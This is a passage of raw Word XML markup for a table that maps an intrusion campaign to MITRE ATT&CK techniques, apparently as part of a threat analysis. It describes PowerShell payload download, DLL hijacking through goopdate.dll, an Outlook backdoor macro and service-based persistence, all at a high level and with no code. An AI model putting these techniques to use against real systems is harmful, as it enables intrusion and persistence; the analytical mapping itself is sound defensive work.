                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T</w:t>
            </w:r>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1105 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Ingress Tool Transfer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1291F43F" w14:textId="7C592954" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="00E35C52" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004420CA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7F2F80B9" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="561D9036" w14:textId="56E2E16F" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0453C8BE" w14:textId="294ECF30" w:rsidR="007B4DCC" w:rsidRPr="00DB171B" w:rsidRDefault="0091136F" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-C2C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D48C8D0" w14:textId="78FEB066" w:rsidR="007B4DCC" w:rsidRPr="00FF1E4B" w:rsidRDefault="004151E8" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r>
              <w:t>The PowerShell process will then download the new ‘image.jpg’ payload, which is actually another obfuscated PowerShell payload:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005D0E9A" w:rsidRPr="00B857D7" w14:paraId="0D4C37E8" w14:textId="77777777" w:rsidTr="006E0AE9">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7068317D" w14:textId="1F4AE18A" w:rsidR="005D0E9A" w:rsidRDefault="005D0E9A" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>14</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="683F8E01" w14:textId="77777777" w:rsidR="005D0E9A" w:rsidRPr="00DB171B" w:rsidRDefault="005D0E9A" w:rsidP="006E0AE9">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0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6937B778" w14:textId="77777777" w:rsidR="005D0E9A" w:rsidRPr="00A1257B" w:rsidRDefault="005D0E9A" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1574</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidRPr="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Hijack Execution Flow</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="19866125" w14:textId="45F1893C" w:rsidR="005D0E9A" w:rsidRDefault="005D0E9A" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>13</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="53498728" w14:textId="77777777" w:rsidR="005D0E9A" w:rsidRPr="00B857D7" w:rsidRDefault="005D0E9A" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46D2E4A5" w14:textId="77777777" w:rsidR="005D0E9A" w:rsidRDefault="005D0E9A" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>G</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="239A62FD" w14:textId="545D0872" w:rsidR="005D0E9A" w:rsidRPr="00B857D7" w:rsidRDefault="0091136F" w:rsidP="006E0AE9">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7DC25CEB" w14:textId="77777777" w:rsidR="005D0E9A" w:rsidRPr="005D0E9A" w:rsidRDefault="005D0E9A" w:rsidP="005D0E9A">
            <w:r w:rsidRPr="005D0E9A">
              <w:t xml:space="preserve">[3] Backdoor exploits DLL hijacking against </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="005D0E9A">
              <w:t>Wsearch</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="005D0E9A">
              <w:t xml:space="preserve"> Service</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="247392A4" w14:textId="77777777" w:rsidR="005D0E9A" w:rsidRPr="005D0E9A" w:rsidRDefault="005D0E9A" w:rsidP="005D0E9A">
            <w:r w:rsidRPr="005D0E9A">
              <w:t xml:space="preserve">[3] The attackers exploited a DLL hijacking vulnerability in a legitimate Google Update binary, </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="74D43D9A" w14:textId="00CD6D62" w:rsidR="005D0E9A" w:rsidRDefault="005D0E9A" w:rsidP="005D0E9A">
            <w:r w:rsidRPr="005D0E9A">
              <w:t>which was deployed along with a malicious DLL (goopdate.dll).</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="101D507A" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="700603A6" w14:textId="2785EAD3" w:rsidR="007B4DCC" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="31C6F6E9" w14:textId="2A6C845A" w:rsidR="007B4DCC" w:rsidRPr="00B857D7"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0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="38FB0902" w14:textId="48CE132B" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CC160B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve">T1547.001 Boot or Logon </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00CC160B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>Autostart</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00CC160B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Execution: Registry Run Keys / Startup Folder</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="11956CB1" w14:textId="490FD56B" w:rsidR="007B4DCC" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="004420CA">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="182B342C" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="409A6895" w14:textId="58EF5110" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2C778969" w14:textId="50C25647" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="757EFAE3" w14:textId="0F70E91D" w:rsidR="007B4DCC" w:rsidRPr="00A1257B" w:rsidRDefault="00990506" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">[3] </w:t>
            </w:r>
            <w:r w:rsidR="007B4DCC" w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t xml:space="preserve">The attackers used a malicious Outlook backdoor macro to communicate with the C2 servers </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="236BC429" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00A1257B" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">and exfiltrate data. To make sure the malicious macro ran, they edited a specific registry value </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="00DF4316" w14:textId="78512FBC" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
              </w:rPr>
              <w:t>to create persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00990506" w:rsidRPr="00B857D7" w14:paraId="26E355B6" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5AEA405E" w14:textId="0B40FC06" w:rsidR="00990506" w:rsidRDefault="00990506" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="67B44ABC" w14:textId="55CC0346" w:rsidR="00990506" w:rsidRPr="00DB171B" w:rsidRDefault="00990506"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0003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Persistence</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0AA4006B" w14:textId="42A3EA44" w:rsidR="00990506" w:rsidRPr="00A1257B" w:rsidRDefault="00990506" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00990506">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1543.003 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00990506">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Create or Modify System Process&gt;:Windows Service</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="50B0AE7C" w14:textId="49B5DA7E" w:rsidR="00990506" w:rsidRDefault="003F4B3E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2522ABEE" w14:textId="77777777" w:rsidR="00990506" w:rsidRPr="00B857D7" w:rsidRDefault="00990506" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="567" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E2A9DFB" w14:textId="059BBCE1" w:rsidR="00990506" w:rsidRDefault="003F4B3E" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="993" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="03FB7BD5" w14:textId="4A74CB84" w:rsidR="00990506" w:rsidRPr="00B857D7" w:rsidRDefault="007A07D3" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>IF-PER</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09CD870E" w14:textId="77777777" w:rsidR="003F4B3E" w:rsidRDefault="003F4B3E" w:rsidP="003F4B3E">
            <w:r>
              <w:t xml:space="preserve">[3] The attackers created and/or modified Windows Services to ensure the loading of the </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="61CA3F18" w14:textId="2CC2C9B4" w:rsidR="00990506" w:rsidRDefault="003F4B3E" w:rsidP="003F4B3E">
            <w:r>
              <w:t>PowerShell scripts on the compromised machines</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w14:paraId="473A5E2F" w14:textId="77777777" w:rsidTr="007B4DCC">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="440" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1C0169CC" w14:textId="40E4F2D0" w:rsidR="007B4DCC" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="005D0E9A">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7D447778" w14:textId="369F12B3" w:rsidR="007B4DCC" w:rsidRPr="00B857D7"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0011 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00DB171B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> Command &amp; Control</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2541" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="46A837EB" w14:textId="4049F27A" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="gramStart"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>T1071.001 :</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r w:rsidRPr="00A1257B">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t xml:space="preserve"> &lt;Application Layer Protocol&gt;:Web Protocols</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="663" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3E761FFE" w14:textId="14D6E81B" w:rsidR="007B4DCC" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>1</w:t>
            </w:r>
            <w:r w:rsidR="00954527">
              <w:rPr>
                <w:rFonts w:cstheme="minorHAnsi"/>
                <w:color w:val="70AD47" w:themeColor="accent6"/>
              </w:rPr>
              <w:t>6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="630" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6463BAE9" w14:textId="77777777" w:rsidR="007B4DCC" w:rsidRPr="00B857D7" w:rsidRDefault="007B4DCC" w:rsidP="007B4DCC">
            <w:pPr>
              <w:rPr>
